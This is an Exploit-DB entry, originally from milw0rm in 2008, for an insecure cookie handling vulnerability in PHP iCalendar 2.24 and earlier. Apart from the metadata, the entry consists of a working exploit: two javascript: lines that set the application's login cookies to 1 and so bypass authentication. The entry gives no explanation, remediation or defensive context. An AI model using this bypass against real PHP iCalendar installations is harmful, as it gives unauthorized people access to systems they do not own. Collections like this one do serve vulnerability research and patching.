PHP iCalendar 2.24 - Insecure Cookie Handling

EDB-ID:

6526

Author:

Stack

Type:

webapps

Platform:

PHP

Published:

2008-09-22

###############################################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";

# milw0rm.com [2008-09-22]